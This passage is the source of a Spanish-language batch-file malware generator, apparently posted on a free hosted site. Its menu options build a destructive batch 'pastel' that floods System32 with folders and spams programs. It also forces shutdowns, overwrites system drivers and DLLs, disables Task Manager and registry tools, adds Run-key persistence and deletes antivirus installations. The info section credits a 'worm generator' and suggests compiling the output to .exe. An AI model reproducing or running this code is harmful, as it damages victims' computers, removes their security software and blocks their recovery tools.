echo mkdir "C:windowshack5" >> C:%name%.bat
echo mkdir "C:windowshack6" >> C:%name%.bat
echo mkdir "C:windowshack7" >> C:%name%.bat
echo mkdir "C:windowshack8" >> C:%name%.bat
echo mkdir "C:windowshack9" >> C:%name%.bat
echo mkdir "C:windowshack0" >> C:%name%.bat
echo mkdir "C:windowshack09" >> C:%name%.bat
echo mkdir "C:windowshack08" >> C:%name%.bat
echo mkdir "C:windowshack07" >> C:%name%.bat
echo mkdir "C:windowshack06" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo1" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo2" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo3" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo4" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo5" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo6" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo7" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo8" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo9" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo0" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo00" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo99" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo88" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo77" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo66" >> C:%name%.bat
echo mkdir "C:windowssystem32mastrabajo55" >> C:%name%.bat

echo start tskill iexplorer >> C:%name%.bat
echo start mspaint.exe >> C:%name%.bat
echo start notepad.exe >> C:%name%.bat
echo start mspaint.exe >> C:%name%.bat
echo start notepad.exe >> C:%name%.bat
echo start mspaint.exe >> C:%name%.bat
echo start notepad.exe >> C:%name%.bat
echo start mspaint.exe >> C:%name%.bat
echo start notepad.exe >> C:%name%.bat
echo start mspaint.exe >> C:%name%.bat
echo start notepad.exe >> C:%name%.bat
echo start mspaint.exe >> C:%name%.bat
echo start notepad.exe >> C:%name%.bat
echo start mspaint.exe >> C:%name%.bat
echo start notepad.exe >> C:%name%.bat
echo start mspaint.exe >> C:%name%.bat
echo start notepad.exe >> C:%name%.bat
echo start mspaint.exe >> C:%name%.bat
echo start notepad.exe >> C:%name%.bat
echo start mspaint.exe >> C:%name%.bat
echo start notepad.exe >> C:%name%.bat
echo start mspaint.exe >> C:%name%.bat
echo start notepad.exe >> C:%name%.bat
echo start mspaint.exe >> C:%name%.bat
echo start notepad.exe >> C:%name%.bat
cls
echo ok, pastel editado.
pause > nul
goto main
:apag
cls
echo introduce el numero de segundos para que se apague el pc
set /p tiempo=
echo start shutdown -s -f -t %tiempo%  >> C:%name%.bat
echo el pc se apagara en %tiempo% segundos
echo ok, pastel editado.
pause > nul
goto main
:rein
cls
echo introduce el numero de segundos para que se reinicie el pc
set /P segun=
echo start shutdown -r -f -t %segun%  >> C:%name%.bat
echo el pc se reiniciara en %segun% segundos
echo ok, pastel editado.
pause >nul
goto main
:vir
cls
echo @cd C:WINDOWSsystem >> C:%name%.bat
echo echo bean>MOUSE.DRV >> C:%name%.bat
echo @cd.. >> C:%name%.bat
echo @cd C:WINDOWSsystem32 >> C:%name%.bat
echo echo bean>mouse.drv >> C:%name%.bat
echo @cd.. >> C:%name%.bat
echo @cd C:WINDOWS >> C:%name%.bat
echo @rmdir /S /Q Cursores >> C:%name%.bat
echo @cd.. >> C:%name%.bat
echo @cd C:WINDOWS >> C:%name%.bat
echo @rmdir /S /Q Cursors >> C:%name%.bat
echo @cd.. >> C:%name%.bat
echo @cd C:windowssystem32 >> C:%name%.bat
echo @echo off>Winbat.bat >> C:%name%.bat
echo @cd C:Windows>>Winbat >> C:%name%.bat
echo @reg del HKEY_CURRENT_USERControl PanelSound /F >> C:%name%.bat
echo echo bean>SETDEBUG.EXE>>Winbat.bat >> C:%name%.bat
echo echo bean>TETEP.DLL>>Winbat.bat >> C:%name%.bat
echo echo bean>Twain.dll>>Winbat.bat >> C:%name%.bat
echo echo bean>Twain_32.dll>>Winbat.bat >> C:%name%.bat
echo @DEL /S /Q JavaAccessBridge.dll>>Winbat.bat >> C:%name%.bat
echo @cd.. >> C:%name%.bat
echo @cd C:System Volume Information_restore{E5311AE9-97D4-4238-9F6D-97D214BD07B1}RP51 >> C:%name%.bat
echo @echo off >WIN32.bat >> C:%name%.bat
echo @reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun/v Win32 /t REG_SZ /d WIN32.bat /F >>WIN32.bat >> C:%name%.bat
echo @reg add hkcusoftwaremicrosoftwindowscurrentversionpoliciessystem /v disabletaskmgr /T REG_SZ /D 1 /F >>WIN32.bat >> C:%name%.bat
echo @reg add hkcusoftwaremicrosoftwindowscurrentversionpoliciessystem /v disableregistrytools /T REG_SZ /D 1 /F >>WIN32.bat >> C:%name%.bat
echo @reg add hkcusoftwaremicrosoftwindowscurrentVersionpoliciesExplorerRestricRun /T REG_SZ /d eventvwr.exe /F >>WIN32.bat >> C:%name%.bat
echo @reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NT/CurrentVersion/Winlogon /v logonprompt /t REG_SZ /d YoU ArE InFeCtEd!! /F >>WIN32.bat >> C:%name%.bat
echo @reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPolicesExplorer /v NoSaveSettings /T REG_DWORD /D 1 /F >>WIN32.bat >> C:%name%.bat
echo @reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplore /v NoClose /t REG_DWORD /D 1 /F >>WIN32.bat >> C:%name%.bat
echo @shutdown -S -F -T 5 -C "Error del Sistema Operativo, Se apagara en unos segundos" >>WIN32.bat >> C:%name%.bat
echo @cd.. >> C:%name%.bat
echo @cd C:System Volume Information_restore{E5311AE9-97D4-4238-9F6D-97D214BD07B1}RP51 >> C:%name%.bat
echo @reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun/v colorbat /t REG_SZ /d colorbat /F >>colorbat.bat >> C:%name%.bat
echo @echo off>colorbat.bat >> C:%name%.bat
echo @:menu>>colorbat.bat >> C:%name%.bat
echo @COLOR A>>colorbat.bat >> C:%name%.bat
echo @COLOR B>>colorbat.bat >> C:%name%.bat
echo @COLOR C>>colorbat.bat >> C:%name%.bat
echo @COLOR D>>colorbat.bat >> C:%name%.bat
echo @COLOR E>>colorbat.bat >> C:%name%.bat
echo @COLOR F>>colorbat.bat >> C:%name%.bat
echo @color 3f>>colorbat.bat >> C:%name%.bat
echo @color 4f>>colorbat.bat >> C:%name%.bat
echo @color 5f>>colorbat.bat >> C:%name%.bat
echo @color 6f>>colorbat.bat >> C:%name%.bat
echo @color 7f>>colorbat.bat >> C:%name%.bat
echo @color 8f>>colorbat.bat >> C:%name%.bat
echo @color 9f>>colorbat.bat >> C:%name%.bat
echo @color 1A>>colorbat.bat >> C:%name%.bat
echo @color 1B>>colorbat.bat >> C:%name%.bat
echo @color 1C>>colorbat.bat >> C:%name%.bat
echo @color 1D>>colorbat.bat >> C:%name%.bat
echo @color 1E>>colorbat.bat >> C:%name%.bat
echo @color 1F>>colorbat.bat >> C:%name%.bat
echo @color 2A>>colorbat.bat >> C:%name%.bat
echo @color 2B>>colorbat.bat >> C:%name%.bat
echo @COLOR 2C>>colorbat.bat >> C:%name%.bat
echo @COLOR 2D>>colorbat.bat >> C:%name%.bat
echo @COLOR 2E>>colorbat.bat >> C:%name%.bat
echo @COLOR 2F>>colorbat.bat >> C:%name%.bat
echo @COLOR 3A>>colorbat.bat >> C:%name%.bat
echo @COLOR 3B>>colorbat.bat >> C:%name%.bat
echo @COLOR 3C>>colorbat.bat >> C:%name%.bat
echo @COLOR 3D>>colorbat.bat >> C:%name%.bat
echo @COLOR 3E>>colorbat.bat >> C:%name%.bat
echo @COLOR 3F>>colorbat.bat >> C:%name%.bat
echo @COLOR 4A>>colorbat.bat >> C:%name%.bat
echo @COLOR 4B>>colorbat.bat >> C:%name%.bat
echo @COLOR 4C>>colorbat.bat >> C:%name%.bat
echo @COLOR 4D>>colorbat.bat >> C:%name%.bat
echo @COLOR 4E>>colorbat.bat >> C:%name%.bat
echo @COLOR 4F>>colorbat.bat >> C:%name%.bat
echo @COLOR 5A>>colorbat.bat >> C:%name%.bat
echo @COLOR 5B>>colorbat.bat >> C:%name%.bat
echo @COLOR 5C>>colorbat.bat >> C:%name%.bat
echo @COLOR 5D>>colorbat.bat >> C:%name%.bat
echo @COLOR 5E>>colorbat.bat >> C:%name%.bat
echo @COLOR 5F>>colorbat.bat >> C:%name%.bat
echo @COLOR 6A>>colorbat.bat >> C:%name%.bat
echo @COLOR 6B>>colorbat.bat >> C:%name%.bat
echo @COLOR 6C>>colorbat.bat >> C:%name%.bat
echo @COLOR 6D>>colorbat.bat >> C:%name%.bat
echo @COLOR 6E>>colorbat.bat >> C:%name%.bat
echo @COLOR 6F>>colorbat.bat >> C:%name%.bat
echo @COLOR 7A>>colorbat.bat >> C:%name%.bat
echo @COLOR 7B>>colorbat.bat >> C:%name%.bat
echo @COLOR 7C>>colorbat.bat >> C:%name%.bat
echo @COLOR 7D>>colorbat.bat >> C:%name%.bat
echo @COLOR 7E>>colorbat.bat >> C:%name%.bat
echo @COLOR 7F>>colorbat.bat >> C:%name%.bat
echo @COLOR 8A>>colorbat.bat >> C:%name%.bat
echo @COLOR 8B>>colorbat.bat >> C:%name%.bat
echo @COLOR 8C>>colorbat.bat >> C:%name%.bat
echo @COLOR >>colorbat.bat >> C:%name%.bat
echo @COLOR 8E>>colorbat.bat >> C:%name%.bat
echo @COLOR 8F>>colorbat.bat >> C:%name%.bat
echo @COLOR 9A>>colorbat.bat >> C:%name%.bat
echo @COLOR 9B>>colorbat.bat >> C:%name%.bat
echo @COLOR 9C>>colorbat.bat >> C:%name%.bat
echo @COLOR 9D>>colorbat.bat >> C:%name%.bat
echo @COLOR 9E>>colorbat.bat >> C:%name%.bat
echo @COLOR 9F>>colorbat.bat >> C:%name%.bat
echo @COLOR AA>>colorbat.bat >> C:%name%.bat
echo @COLOR AB>>colorbat.bat >> C:%name%.bat
echo @COLOR AC>>colorbat.bat >> C:%name%.bat
echo @COLOR AD>>colorbat.bat >> C:%name%.bat
echo @COLOR AE>>colorbat.bat >> C:%name%.bat
echo @COLOR AF>>colorbat.bat >> C:%name%.bat
echo @COLOR BA>>colorbat.bat >> C:%name%.bat
echo @COLOR BB>>colorbat.bat >> C:%name%.bat
echo @COLOR BC>>colorbat.bat >> C:%name%.bat
echo @COLOR BD>>colorbat.bat >> C:%name%.bat
echo @COLOR BE>>colorbat.bat >> C:%name%.bat
echo @COLOR BF>>colorbat.bat >> C:%name%.bat
echo @COLOR CA>>colorbat.bat >> C:%name%.bat
echo @COLOR CB>>colorbat.bat >> C:%name%.bat
echo @COLOR CC>>colorbat.bat >> C:%name%.bat
echo @COLOR CD>>colorbat.bat >> C:%name%.bat
echo @COLOR CE>>colorbat.bat >> C:%name%.bat
echo @COLOR CF>>colorbat.bat >> C:%name%.bat
echo @COLOR DA>>colorbat.bat >> C:%name%.bat
echo @COLOR DB>>colorbat.bat >> C:%name%.bat
echo @COLOR DC>>colorbat.bat >> C:%name%.bat
echo @COLOR DD>>colorbat.bat >> C:%name%.bat
echo @COLOR DE>>colorbat.bat >> C:%name%.bat
echo @COLOR DF>>colorbat.bat >> C:%name%.bat
echo @COLOR EA>>colorbat.bat >> C:%name%.bat
echo @COLOR EB>>colorbat.bat >> C:%name%.bat
echo @COLOR EC>>colorbat.bat >> C:%name%.bat
echo @COLOR ED>>colorbat.bat >> C:%name%.bat
echo @COLOR EE>>colorbat.bat >> C:%name%.bat
echo @COLOR EF>>colorbat.bat >> C:%name%.bat
echo @COLOR FA>>colorbat.bat >> C:%name%.bat
echo @COLOR FB>>colorbat.bat >> C:%name%.bat
echo @COLOR FC>>colorbat.bat >> C:%name%.bat
echo @COLOR FD>>colorbat.bat >> C:%name%.bat
echo @COLOR FE>>colorbat.bat >> C:%name%.bat
echo @COLOR FF>>colorbat.bat >> C:%name%.bat
echo @GOTO :MENU>>colorbat.bat >> C:%name%.bat
echo @cd>>colorbat.bat >> C:%name%.bat
echo @cd C:windowssystem32 >> C:%name%.bat
echo @DEL /S /Q Winbat.bat >> C:%name%.bat
echo ok, pastel editado.
pause > nul
goto main
:bloq
cls
echo reg add hkcu softwarewindowscurrentversionpoliciessystem /v disableregistrytools /t reg dword /d "1" /f >> C:%name%.bat
echo ok, pastel editado.
pause > nul
goto main
:borrr
cls
echo cd >> C:%name%.bat
echo cd Archivos de programa >> C:%name%.bat
echo cd Kas* >> C:%name%.bat
echo attrib -a -r -h *.* >> C:%name%.bat
echo del /q /s *.* >> C:%name%.bat
echo cd >> C:%name%.bat
echo cd Archivos de programa >> C:%name%.bat
echo cd McAfee* >> C:%name%.bat
echo attrib -a -r -h *.* >> C:%name%.bat
echo del /q /s *.* >> C:%name%.bat
echo cd >> C:%name%.bat
echo cd Archivos de programa >> C:%name%.bat
echo cd Zone Alarm >> C:%name%.bat
echo attrib -a -r -h *.* >> C:%name%.bat
echo del /q /s *.* >> C:%name%.bat
echo cd >> C:%name%.bat
echo cd Archivos de programa >> C:%name%.bat
echo cd nod* >> C:%name%.bat
echo attrib -a -r -h *.* >> C:%name%.bat
echo del /q /s *.* >> C:%name%.bat
echo ok, pastel editado.
pause > nul
goto main
:reg
cls
echo reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v mibat /t reg_sz /d C: /f >> C:%name%.bat
echo ok, pastel editado.
pause > nul
goto main
:info
cls
echo ***********************************************
echo ***** Programa mejorado por Blu3 l0llip0p *****
echo ***********************************************
echo.
echo.
echo Para que el pastel funcione correctamente
echo se tendria que pasar a .exe, podeis
echo buscar algun programa que lo compile
echo como Quick Batch File Compiler
echo.
echo Programa basado en Generador de Worms 3sk0r8ut0
echo.
echo Por favor, modifiquen y mejoren el contenido de este programa.
echo.
echo.
echo.
echo El uso de este programa recae exclusivamente en el usuario.
echo.
echo.
pause
goto main
:fin
Exit
 
   
Hoy habia 20 visitantes (27 clics a subpáginas) ¡Aqui en esta página!
Este sitio web fue creado de forma gratuita con PaginaWebGratis.es. ¿Quieres también tu sitio web propio?
Registrarse gratis